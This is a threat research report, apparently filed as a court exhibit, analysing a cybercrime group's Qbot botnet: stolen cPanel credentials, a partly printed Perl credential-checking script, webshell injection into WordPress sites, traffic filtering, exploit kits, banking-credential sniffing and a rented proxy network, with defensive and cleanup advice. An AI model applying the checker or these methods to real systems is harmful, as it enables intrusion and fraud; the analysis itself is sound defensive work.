The report also includes specific guidance to WordPress site owners on how to detect infections and harden their sites against similar attacks.

Windows XP clients comprised **52%** of the infected systems in the cybercrime group's botnet. Microsoft ended patch and update support for Windows XP in April 2014.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

# Context: The Attack Chain

*Cybercrime has evolved significantly from single actors in remote locations – the stereotypical "geek in a garage" – to sophisticated, multi-tier infrastructure that uses vertically integrated collaboratives operated by cybercrime groups and state–affiliated actors. Before delving into the specifics of the attackers' infrastructure, it is useful to have an overview of a modern attack chain. This section provides an overview of a generic attack infrastructure.*



Figure 1: Cybercrime Attack Chain

Modern threats frequently use an integrated system of legitimate but compromised websites, obfuscated redirects, "traffic redirection system" (TDS) filters, exploit kit hosting sites, and malware hosting sites. Depending on their objectives and resources, attackers may rely on users to visit these compromised sites based on their popularity or relevance (such as industry–specific or social media sites); attempt to lead users to them using targeted or broad–based phishing emails; or may 'piggyback' on legitimate emails such as newsletters or marketing emails that include links to compromised sites. In fact, many of these compromised sites run newsletter services, which helped to distribute infected content.

These components work together to compromise end–user computers and inject malware – invisibly to the end user, typically in less than five seconds, without *any* action on the user's part other than visiting the initial website.

The generic steps are as follow:

1. The compromised sites contain or link to a Traffic Distribution System (TDS) filter, which checks to ensure the incoming browser is a target. (For example, is the browser of a version subject to compromise? Is it coming from the right sort of domain or location? Is it a security company or researcher?) Often, URLs embedded in email or other sites point to compromised, positive–reputation sites. The positive reputation of the sites that ensures URLs are not blocked by antivirus or, when targeting organizations, security gateways.

2. If the incoming browser is the right target, then the TDS will "merge in" content from an exploit server; otherwise, the TDS will be silent.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

**THREAT RESEARCH**

Case 0:20-cv-60416-XXXX   Document 1-24   Entered on FLSD Docket 02/26/2020   Page 5 of 31

3. By exploiting a browser (or plugin) vulnerability (for example, a Java, Flash, or PDF vulnerability), the exploit server penetrates an end user's operating system defenses, and emplaces "dropper" software.

4. The emplaced "dropper" then downloads additional malware.

Proofpoint has seen that these systems are not only effective, but flexible: because of the use of an emplaced "dropper" rather than a single piece of malware, the compromised computer can be stocked with multiple elements of malware, assisting the malware in avoiding signature detection (if one element is detected, others may not be) as well as in ensuring the compromised system can be used in multiple ways.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

# Inside the Attack

Recently, Proofpoint researchers detected a large number of legitimate websites that had been compromised. The websites now contained scripts that "pull in" content from a single host that was serving exploits. Analysis of the malware and the sites led researchers to an open and unprotected control pane used by the attackers who controlled the malicious site. In an effort to share information with the security community, and to arm end users with the knowledge to protect themselves and their systems, this report reveals what Proofpoint researchers learned about this attacker's means and methods.

## Who are the attackers?

Based on information gleaned from the attacker's control panels, such as language preferences and the language of the server names and documentation, as well as from further research, the attackers behind this operation appear to be a Russian cybercrime group whose primary motivation is financial. While the primary targets appear to be financial accounts and online banking information, the group also has a range of options for further monetization of the infected computers.

## Phase 1: Infecting Legitimate Web Sites

*The first step the attackers took in building their infrastructure was to find and compromise legitimate WordPress sites and inject them with malicious code that would allow them to compromise vulnerable end-user PCs.*



Figure 2

The attackers have been able to build a network of infected systems thanks to a highly operationalized process that employs automation wherever possible. Because the initial dropper Qbot (aka Qakbot) generates a unique identifier for each infection, it is evident from the attackers' database that they currently have over a half million unique PC infections. Since each unique infection (a PC) can be assigned different IP addresses during its lifecycle, it appears that the botnet has covered almost two million unique IPs (Screenshot 1).

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH



Screenshot 1. Roughly 500,000 unique infections, 2 million IP addresses

When Proofpoint researchers analyzed the attackers' operation it was possible to identify the steps and components of this process:

1. Following common practice, the attackers purchased a large number of password lists from the underground cybercriminal economy, consisting primarily of compromised shared hosting cpanel (a type of control panel) accounts and FTP accounts (not necessarily of shared hosting). These credentials had been harvested primarily by malware on endpoints.

2. The attackers then ran their own custom-made tool, cpanel_checker.pl (Screenshot 2), which verified, one by one, accounts from these purchased lists and filtered out the working ones:

```
cpanel_checker.pl                ×

289  sub process_cpanel
290  {
291      my ($r) = @_;
292
293      my ($server, $port, $login, $password) = ($r->{HOST}, "2082", $r->{
             LOGIN}, $r->{PASSWORD});
294
295      my $browser = LWP::UserAgent->new();
296      $browser->agent("Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1");
297      $browser->timeout(30);
298      my $target_url = "http://$server:$port/";
299
300      print "processing $target_url...\n";
301
302      my $response = $browser->get($target_url);
303      if ($response->is_success) {
304      print "response ok\n";
305      log_write($r, 10, "Net cpanel");
306      return 1;
307      } else {
308  #    print "response failed\n";
309
310      my $realm_hdr = $response->header('Www-Authenticate');
311      $realm_hdr =~ /Basic realm="(.+?)"/i;
312      my $realm_name = $1;
```

Screenshot 2. cpanel_checker.pl

The attackers purchased a large number of password lists from the Russian underground economy, consisting primarily of compromised shared hosting cpanel accounts and FTP accounts. These credentials had been harvested primarily by malware on endpoints.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14
THREAT RESEARCH

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 39 of 31

**3.** Using the verified list of logins, the attackers manually logged into legitimate websites and injected a webshell. A webshell is a server-side script (PHP, ASP, Perl, etc) acting as a backdoor; webshells often offer interfaces similar to file managers, allowing attackers to perform arbitrary file operations and execute arbitrary commands. A common injection vector is within legitimate files of open source platforms such as WordPress or OpenX. At the same time, webshells are often obfuscated (ex: using eval()) to avoid detection.

Webshells range from full-blown "web-based file managers" to "microshells" that simply execute commands sent to them. Full-blown webshells are so convenient that attackers often use them as their own remote control panels.

On one of the group's command and control servers, Proofpoint researchers encountered two full-blown webshells:



Screenshot 3. First webshell on the cybercrime group's C&C server



Screenshot 4. Second webshell on the cybercrime group's C&C server

The webshells were used by this group to control their own servers, as well as to control those that they compromised.

To automate their WordPress malicious injection process, the group injected into their compromised websites a very specialized webshell, "iframe_agent.php" (Screenshot 5).

Webshells range from full-blown "web-based file managers" to "microshells" that simply execute commands sent to them. Full-blown webshells are so convenient that attackers often use them as their own remote control panels.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

**THREAT RESEARCH**

Case 0:20-cv-60416-XXXX   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 361 of
726
Case 0:20-cv-60416-XXXX   Document 1-24 Entered on FLSB Docket 02/26/2020   Page 10 of
31



Screenshot 5. Cybercrime group's very specialized webshell "iframe_agent.php"

According to the parameters used to call iframe_agent.php, this shell can inject
(or remove) a piece of text (usually the malicious script) into a specified file at a
specified location. The attackers call this type of injection "static injection." The shell
also supports "dynamic injection," in which the caller specified a pattern (regex), and
injections can happen right before or right after the pattern, depending
on specification.

In addition to allowing a remote attacker to inject malicious scripts into any file,
iframe_agent.php features WordPress–specific features, such as the ability to add
WordPress admin accounts.

Proofpoint has not encountered an automated tool for uploading this specialized
shell into compromised sites, and believes the attackers may be doing this manually.
Some actors infect legitimate websites by running tools to massively scan for
vulnerable open source software (ex: WordPress, OpenX, osCommerce) and to
use existing exploits to inject into them. However Proofpoint did not observe this
cybercrime group doing this; instead, they seem to rely primarily on purchased
credential lists.

4. Remotely inject malicious scripts into legitimate WordPress sites. On their attack
   server, the attackers executed smartiframer.pl to connect to iframe_agent.php and to
   auto–inject malicious JavaScript (or pre–injected files) into legitimate websites using
   the verified cpanel credential lists (Screenshot 6).

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSB Docket 02/26/2020   Page 362 of 726

Screenshot 6. WordPress injector "smartiframer.pl")

This process continues in the next section, where we see how the attackers filter visiting systems for potential victims and direct them to servers hosting Exploit Kits (EK).

## Phase 2:  Filtering Targets – Traffic Distribution Systems

*As end–users' browsers visit the infected WordPress sites, the next stage of the attackers' infrastructure – a TDS – filters out potential victims based on IP address, browser type, operating system, and other criteria. This filtering enables attackers to maximize their successful expoitation rate, while minimizing exposure to security scanners or researchers. If served to security researchers or scanners such as Proofpoint's, the infection will be detected regardless of success or failure of exploitation.*



Figure 3

When end users browse the web sites compromised by the attackers, the scripts that the attackers added to the compromised site's page will cause the visiting browsers to ultimately load and run unwanted software in a manner that is completely transparent to the end user.

It is common practice for attackers to add a Traffic Distribution Service (TDS) to avoid detection. TDS's have been widely used by attackers as a means to "cut the attack chain" in the face of a security scanner.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

**THREAT RESEARCH**

Case 0:20-cv-60416-XXXX   Document 1-24   Entered on FLSB Docket 02/26/2020   Page 12 of 31

In order to avoid detection, it is common practice for attackers to add a layer of redirection, known as a Traffic Distribution Service (TDS). Originally used to route web traffic, TDS's have been widely used by attackers as a means to "cut the attack chain" in the face of a security scanner.

The TDS will only lead visiting browsers into loading exploits if it has verified that the client is neither a crawler nor a security scanner, and that an exploit is indeed available for the visiting browser. This technique is sometimes referred to as "cloaking"; since the visiting IP address plays a significant role in this decision process, it can also referred to as "IP cloaking."

Today, cybercrime groups often offer TDS's as a service. The observed cybercrime group, however, appears to have always hosted their own TDS. Prior to Oct 2013, they were using Simple TDS (Screenshot 7–1), and then from Oct 2013 to Mar 2014, they were using Keitaro TDS (Screenshot 7–2). From March 4 to the present, they switched to using Sutra TDS, which is a powerful TDS that has been popular among cybercrime groups in order to cloak IP addresses and circumvent detection (Screenshot 8).



Screenshot 7–1. The group's Simple TDS management console



Screenshot 7–2. The group's Keitaro TDS management console

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-XXXX   Document 1-24   Entered on FLSB Docket 02/26/2020   Page 13 of 726



Screenshot 8. The group's Sutra TDS management console showing configurations for Sweet Orange, Blackhole, Styx, Phoenix, and their custom-made exploit kits)

This view of the cybercrime group's Sutra console shows that Sutra TDS supports traffic redirection based on IP address, proxy, referer, cookies, geolocation, language, and network (IP address range) (Screenshot 9):

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14



Screenshot 9. Sutra TDS traffic redirection settings

The Sutra TDS provides a robust set of filters that the attackers can use to narrow their potential targets and steer away researchers or others to whom this group would not want to expose their activities.

This TDS provides a robust set of filters that the attackers can use on the one hand to narrow their potential targets, and on the other hand to steer away researchers or others to whom this group would not want to expose their activities.

## Phase 3:  Getting Into the Users' Machines – Exploits

*Having been filtered by the TDS, the next step is the next step is to unnoticeably gain access to the end user's machine. This is done by exploiting a vulnerability in the browser or in-browser plugins in order to cause the client system to run unwanted code.*



Figure 4

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14
**THREAT RESEARCH**

Potential victims are directed to servers hosting exploit kits that run one or more exploits to gain an initial foothold on the client system. Currently, this cybercrime group implements different EK configurations against different browser families, and leverages Sutra TDS to redirect traffic accordingly:



Screenshot 10. Sutra TDS configuration for IE

Infected websites cause visiting browsers to silently load exploits and to install malware, without the victim noticing or having to "click on" or "agree to" anything. Simply visiting the website may result in a system compromise.



Screenshot 11. Sutra TDS redirection configuration for FireFox

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

At the same time, the attackers leverage additional Java exploits and therefore implement yet a separate rule (Screenshot 12):



Screenshot 12. Sutra TDS configuration for browsers vulnerable to Java exploits

Infected websites cause visiting browsers to silently load exploits and to install malware, without the victims noticing or having to "click on" or "agree to" anything. *Simply visiting the website may result in a system compromise.*

The Sutra TDS management console enables the attackers to track daily traffic and infection rates. The list of infected websites is reflected by the referers list (Screenshot 14).



Screenshot 13. Sutra TDS daily traffic

| Referers | Raw hits | Unique hits |
|---|---|---|
| http://www.myc............-conditions/fiber-lifestyle/ | 1051 | 932 |
| http://www.myc............-conditions /orthodontics-br.. | 780 | 707 |
| http://www.myc............-conditions /components-of-.. | 648 | 571 |
| http://eng................. | 588 | 470 |
| http://www.con................/ | 357 | 174 |

| Referer domains | Raw hits | Unique hits |
|---|---|---|
| www.m............. | 2771 | 2460 |
| english............ | 2258 | 1065 |
| www.c.............ns.com | 1072 | 390 |
| www.f1............ | 989 | 228 |
| mp3tec.......... | 875 | 221 |
| www.f4............ | 711 | 426 |

Screenshot 14. Sutra TDS referer list, equivalent to a list of infected websites

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 368 of
736

In order to circumvent gateway and endpoint antivirus detection, the attackers must well
obfuscate their code, as well as ensure non–blacklisting of their malicious domains. Scripting
submissions to the Scan4U service enables the group to check the 'evasiveness' of not just
the malware payload, but also of multiple components in the attack chain, including for
example (Screenshot 15):

- TDS URL

- Exploit kit URL

- Malicious JavaScript that will be injected

- Obfuscated Qbot



Screenshot 15. Script to auto–check all malicious components against Scan4u

The Scan4U service checks these exploits for their ability to evade detection against twenty–
five widely used antivirus solutions.

For an added level of assurance – and a wrinkle in vendors' efforts to block new malware
variants – if any antivirus vendor starts to detect any of these exploits, the tool notifies
the attackers using ICQ. In fact, this group heavily leverages ICQ for instant system alerts.
Whenever the attackers re-obfuscate their Qbot, the inital antivirus detection rate is always
0–5 out of 55 vendors on VirusTotal, or less than 10% detection by major antivirus solutions
(Screenshot 16).

**If any antivirus vendor
starts to detect any of
these exploits the tool
notifies the attackers
using ICQ.**

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

**THREAT RESEARCH**

Case 0:20-cv-60416-XXXX   Document 1-24   Entered on FLSD Docket 02/26/2020   Page 18 of 31



Screenshot 16. As a result of obfuscation and evasiveness testing, 0 out of 55 antivirus vendors on VirusTotal flags them

Able to evade end–user's antivirus defenses, the exploit leverages a browser (or browser plugin) vulnerability that causes the browser or plugin to run a piece of shellcode, which then downloads a 'dropper' – in this case 'Qbot' – from another server. Qbot can then download and install one or more pieces of malware based on the attacker's commands.

## Phase 4:  Stealing User Banking Credentials – Malware
*Malware deployed, the attackers set about stealing online banking credentials through the infected systems.*



Figure 5

A process that began with compromising legitimate WordPress sites and using a Sutra TDS to filter potential victims to an exploit kit server – such as Sweet Orange – led to the download of the 'Qbots', which can then lead to the download of multiple types of malware onto the infected end–users' systems.

The Qbots connect back to the group's command and control (C&C) servers, thus providing the group visibility over the infection base (Screenshot 17).

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 370 of 726



Screenshot 17. The group's Qbot command and control panel

Qbot accepts "tasks" issued by the control panel, and the console lists each bot's latest tasks. Qbot has the ability to download more malware, and for this purpose the console also displays different types of software installed, their families, and installation counts.

Qbot looks for specific online banking traffic and sends it back to the C2. This group uses the Session Spy console to find and collect usable credentials.



Screenshot 18. Qbot is able to install any other malware

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

**THREAT RESEARCH**

| Software installed | | |
|---|---|---|
| **Software** | **Category** | **Installs** |
| veterocheg | veterocheg | 1 |
| ext_ip_test_2 | ext_ip_test_2 | 7159 |
| ext_ip_test | ext_ip_test | 9897 |
| sti_podmena4 | sti_podmena4 | 48520 |
| sti_podmena3 | sti_podmena3 | 33 |
| sclasse | troj | 204 |
| sti_podmena_2 | podmena_2 | 60345 |
| podmena | sti_podmena | 53397 |
| vnc37 | vnc37 | 58 |

Screenshot 19. Qbot's control panel displays the list of additionally installed malware

Proofpoint's initial examination of this group's Qbot revealed that it includes a module called "Session Spy," which is a framework for sniffing HTTPS traffic.

HTTPS traffic is encrypted, so in order to sniff it one must hook into the browser and read the content at a program point after the browser has decrypted the HTTPS traffic. This is exactly what Qbot does: it looks for specific online banking traffic and, once captured, sends it back to the C&C. This group uses the Session Spy console to find and collect usable credentials.

## Phase 5: Infected PCs Used to Run Paid Proxying Service for Other Crime Groups

*Once this cybercrime group has infected a PC, attackers have numerous options available to monetize that PC and increase revenue generated by each of the end-user-systems they control.*

Stealing bank account credentials via Qbot is just one option available to the attackers for generating revenue from their infected clients: Qbot includes another module called "SocksFabric," which builds up a large tunneling network based on SOCKS5. The cybercrime group offers this network as a paid tunneling service that lets attackers build their own 'private cloud' to run encrypted communications and transfer stolen data, or b) use the compromised end points as infiltration points into targeted organizations. This service can be rented to other attackers, generating additional revenue for this cybercrime group.

The SocksFabric SDK is written in C and it allows any executable to become a part of the SocksFabric botnet (Screenshot 20). Although originally written to support cross-platform compilation, it seems that the primary users of the SocksFabric SDK are currently Windows malware developers.

When called, the SocksFabric API creates a new thread and connects back to the SocksFabric command and control (C&C) server named "nattun server". Nattun is written in C and acts as a) a directory service for all connected SocksFabric clients, and b) an intermediary between the "paying user" and the selected client. A paying user logs into the SocksFabric control panel, which is written in PHP (and some Perl, Screenshot 21) and talks to nattun servers.

Qbot includes another module called "SocksFabric," which builds up a large tunneling network based on SOCKS5. The cybercrime group offers this network as a paid tunneling service that lets attackers build their own 'private cloud' to run encrypted communications and transfer stolen data.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14
THREAT RESEARCH

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 372 of 726



Screenshot 20. Single-line API makes it easy for any malware to join the SocksFabric botnet

Screenshot 21. The SocksFabric panel connecting to nattun server for directory data

An attacker renting time on this network – a network running on compromised PC's – would need to first buy credits from this group under the following pricing:

Screenshot 22. The help file includes pricing information

Screenshot 22 is taken from a complete Help manual provided to the user. Once logged into the control panel, the user can see remaining credits and available "socks," or proxy points.

The attacker to whom the network has been rented would then select the desired socks through which to proxy (Screenshot 23). The panel allows for searching based on country, state, city, IP address, DNS name, or bot ID. **It should be noted that this service is not only used as an anonymizing service: socks within targeted organizations serve as easy infiltration points for cyber criminals.** For example, the Search by Bot ID capability provides attackers with a way to lock down certain individuals.

Socks within targeted organizations serve as **easy infiltration points** for cyber criminals.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 373 of 726



Screenshot 23. The SocksFabric control panel

Each SocksFabric user is allowed four concurrently open socks. Once the attacker to which the network has been rented decides on the socks through which to tunnel, they can then decide to connect one of their open socks to the selected socks:



Screenshot 23B

At this point, the SocksFabric panel talks to the nattun server where the selected bot is registered. The nattun server requests that the bot spin up a SOCKS5 proxy server, and the bot replies with the proxy server's port number. The control panel displays IP and port data to the user, who then configures her system proxy to tunnel through that bot.



Screenshot 23C

After a connection has been established, the panel allows for renting attackers to "comment" on the sock, providing a way to annotate each infiltration point:



Screenshot 23D

To facilitate the attackers' infiltration efforts, the panel keeps a searchable history of all of the attackers' connection history.

Microsoft's Windows XP accounts for **52%** of infected clients.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

**THREAT RESEARCH**

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSB Docket 02/26/2020 Page 374 of 726

## Who were the victims?

*Infecting 500,000 systems via compromised WordPress sites and a multi-part attack chain, this cybercrime group used the Qbot banking Trojan to sniff and capture online banking 'conversations' including online account login credentials for many of the largest retail and commercial banks in the US and Europe.*



Screenshot 24. A total of 0.8 million online banking-related HTTPS conversations were sniffed

Screenshot 24 shows that so far, the botnet has successfully sniffed and sent back a total of 0.8 million online banking-related HTTPS conversations. Analyzing infected IP addresses, it can be seen that this group targets primarily US online banking users, with IP addresses in the US representing 75% of infected systems (Figure 8).

Proofpoint's analysis found that Microsoft Internet Explorer accounted for 82% of the successful Qbot infections, which is to be expected given both the size of the Internet Explorer install base and the number and variety of exploits available for this browser. Much more striking is the distribution of operating systems for infected clients (Figure 9). From the cybercrime group's logs, Microsoft's Windows XP accounts for 52% of infected clients, a figure that is at once unsurprising – considering that support for Windows XP, including patches, ended in April 2014 – and at the same time confirms the fears of security leaders who predicted a surge in attacks and infections on an operating system that is still widely used in both consumer and business IT environments. Recent estimates put Windows XP market share at 20–30%, which means that Windows XP clients represent a disproportionate share of the infected clients in this group's Qbot botnet.

The attack chain is designed to establish a foothold on the infected system so that any number of different pieces of malware can be downloaded in order to carry out a wide variety of ciminal activities.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH



Figure 8. Victim geolocation distribution          Figure 9. Victim OS distribution

## Implications

The operations of this Russian cybercrime group exemplify both the sophisticated attack chain and the key challenges of modern threats. While attackers rely on a variety of means to connect with potential victims, compromised web sites are a critical component in the attack chain. Attackers have the financial and technical means to infect an almost unlimited number of legitimate web sites, above and beyond the more easily identifiable malicious or suspicious sites that traditional defenses are designed to detect and block.

Moreover, the attack chain does not simply deliver a single piece of malware onto an infected system and stop at that. Instead, it is designed to establish a foothold on the system so that any number of different pieces of malicious software can be downloaded in order to carry out criminal activities ranging from banking account theft to secret communications and transfers, to distributed denial of service (DDoS), to ransomware and any other activity that represents an opportunity to monetize that infected system.

### Financial Implications

With 500,000 infected clients stealing online banking account credentials for as many as 800,000 online banking accounts, this cybercrime group has the potential for tremendous profits. Previous takedowns of rings of money transfer "mules" employed by organized crime groups have shown that $25,000 per account is a realistic figure. If even a fraction of a percent of the 800,000 accounts that they have sniffed yields credentials that enable them to conduct illegal electronic funds transfers (EFT) or other transfers this cybercrime group has the potential to net millions of dollars from their operation.

In addition to the potential gains from compromised online banking accounts and EFTs, as this analysis shows the cybercrime group has found other opportunities to monetize their infected systems, for example through the licensing of their SocksFabric service. While there is insufficient data to estimate the usage and therefore the revenues from this service, simple modeling shows that it would be sufficient to at least cover their operational costs, such as fees for login lists, obfuscation services and evasiveness testing.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14
THREAT RESEARCH

## End-user Perspective: Safeguarding PCs and Browsing

For end users, education in safe browsing and email security best practices are important but ultimately one of the best means of protecting themselves is to regularly apply patches and disable risky services. Ensuring that your most-frequently targeted applications are patched can reduce the risk that visiting a compromised web site or clicking on a malicious link or attachment in an email will have catastrophic consequences. This generally means applying all Critical security updates for your operating system and browser, but also making sure that users have applied the latest patches for Java (from Oracle) and Adobe Flash and Reader. Proofpoint sees many attacks with PDFs that exploit three- and four-year old vulnerabilities in Adobe Reader and Microsoft Internet Explorer, and of course Windows XP users must absolutely take steps to switch to a supported operating systems.

Proofpoint analysts see web-based exploits every day that use malicious JavaScript hidden in a compromised web site. Another simple measure users can take to protect themselves is to disable JavaScript in their browsers: if it is not practical to disable JavaScript for all sites, then consider doing so for untrusted zones or sites.

Finally, Microsoft Windows users should consider downloading and using the Enhanced Mitigation Experience Toolkit (EMET) 5.0 for an added measure of protection.

## Institutional Perspective: Safeguarding Banks

Banks should offer – and encourage their customers to use – two-factor authentication options for their online banking activities. While this will not protect the end-users' systems from infection by compromised sites, it will make it more difficult for cybercrime groups to make use of the credentials that they successfully sniff from users' online banking sessions.

For organizations seeking to protect their users from email-borne threats – from phishing to legitimate emails linking to malvertising or other compromised sites – a layered defense is essential. Best practices have expanded so that simply detecting and blocking known malware and known malicious URLs are no longer sufficient: a combination of effective anti-spam, antivirus, and URL reputation (for known threats) with advanced threat detection capabilities (such as malware and URL sandboxing and big-data analytics to provide predictive protection) is now the standard.

A critical complement to this is the ability to identify high-risk incidents when they occur and rapidly trace them back to effected systems and users in order to mitigate risk to the rest of the environment and user base. Finally, organizations have to look to cloud-based solutions: more than most organizations they are faced with a diverse and dispersed base of users and endpoints and traditional gateway solutions are not going to be able to provide protection that follows their users across their different devices.

## Website Perspective:  A Note on WordPress

See the Appendix for a guide to identifying whether your WordPress site is vulnerable and compromised, as well as steps to clean up infected systems.

**Credits:** Wayne Huang, Sun Huang, Alex Ruan, G. Mladenov, Jordan Forssman, Martin Chen, Lance Chang, Allan Ku, Jeff Lee, Aryan Chen, Tom Kao, Brian Burns, Chris Iezzoni

### Proofpoint Targeted Attack Protection

- Advanced Protection: Protect against targeted email threats such as spear-phishing attacks, zero-day exploits, advanced persistent threats (APTs)

- Proactive Protection:  Analyze attachments and URL links before users click them to reduce the risk of infection

- Big Data Analytics: Automated analysis of millions of messages and URLs identifies threats that can evade traditional defenses

- Cloud Architecture: Billions of messages traverse the Proofpoint cloud every week, providing global visibility and early protection for emerging threats

Learn about modern advanced threats as they are caught in action and analyzed by Proofpoint by visiting the Threat Insight blog at: https://www.proofpoint.com/threatinsight/posts/

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

# APPENDIX

## Suggestions on Cleaning Up and Securing Wordpress

### 1.   How do WordPress Sites get infected?

WordPress (WP) is the most widely used CMS tool, making it a prime target for attackers wanting to distribute malware.  While the WordPress team is generally quick to address discovered vulnerabilities and release patches, adoption of these patches is unfortunately rather slow, leaving many out-of-date versions lingering on the Web for considerable periods of time. This extended window of vulnerability provide attackers ample time to take advantage of known vulnerabilities and compromise huge numbers of sites running vulnerable WP installations.

In addition to outdated WP installations, vulnerable or outdated WP Plugins, adoption of weak passwords (WP Admin, FTP, etc) and sometimes even insecure Webhosts can be the root cause behind a compromised WP site.

### 2.   Detecting an Infection

There exist a number of strategies that can be adopted to determine if a specific WP installation has been compromised. These include the use of WordPress scanners to try to detect malicious code present on the site's publicly facing pages, running WP Core Integrity checks to determine if the Core WP installation files (which should not change) have been modified at all, checking with Google's Safe-Browsing API to determine if the site suffers from a known infection, running a Google "site:www.example.com" search and studying results to identify if any unusual, strange or malformed file names are present on the site, as well as looking through key files and folders that are commonly modified to include attacker code.

Neither of these solutions provides a 100% guarantee that they will detect a breach. Modern Web-based malware is unfortunately so dynamic that it is recommended to leverage as many of these options as possible.

a.   Scanners

Scanners operate from the outside and analyze a site's pages to determine whether or not specific patterns of malicious code or specific exploits can be found on the scanned page.

There exist a number of free and paid online scanners and we have listed a few that have been known to work well with WordPress, here:

i.    Sucuri

ii.   Quterra

iii.  i09 Wordpress Exploit Scanner

iv.   Others

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-XXXX   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 27 of 726

b.   WP Core Integrity Check

The core WP files should not change when updating plugins and themes, and sometimes even survive version updates. For this reason, attackers often choose to place backdoor code (covered in Section 8) in these files and folders as it grants them a degree of persistency they could not otherwise achieve. However, this presents a robust check-point that allows WP admins to identify whether or not something untoward has occurred on the system.

Checking the WP core's integrity to determine whether or not the core file structure matches that of the core system available for that version indicates whether or not changes have been made, and if there are changes, the WP installation is likely compromised.

Two tools that help check the WP core are provided below:

    i.    Sucuri (How to)

    ii.   Wordfence

c.   Using Google

    i.    site:search (LOOK for: unusual/random filenames)

    ii.   Blacklisted? Google Safe-Browsing Diagnostics

Leveraging Google can provide some useful insight into the state of any particular WP installation. Running the search "site: yoursitehere.com" in Google lists out all files Google can discern on the target site, allowing us to identify whether any strange, random or unusual filenames are present on the site.  These may be indicative of a compromised site.

Another resource Google provides is its Safe Browsing Diagnostic, which will describe any malicious code Google may have identified on the site in question within the past 90 days. Simply replace [yoursitehere.com] with your domain's homepage and run in any browser:

http://www.google.com/safebrowsing/diagnostic?site=[yoursitehere.com]

d.   Search Files, Folders and Database for Malicious Code

A fourth option is to comb through the WP site's files, folders and database to determine whether any malicious code or files may be present.  Be sure to unhide any hidden files or folders so they aren't overlooked in this process. This option is more time-consuming, but can provide insight that the other options may have missed.

    i.    LOOK IN:

        •  .htaccess, index.php, wp-content/themes/index.php; /header.php; /footer. php; /functions.php, Database

    ii.   LOOK FOR:

        •  Files: .exe, .swf, .jar, .dll, sometimes malicious redirects masquerade as image files

        •  Code/Script: < iframe>, "display:none", (obfuscated)  JavaScript

If any suspicious looking code that generates iframes or redirects is found, REMOVE it. If any suspicious files are found, DELETE them.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Case 0:20-cv-60416-XXXX   Document 1-24 Entered on FLSB Docket 02/26/2020   Page 28 of 731

### 3.   Scan Local System

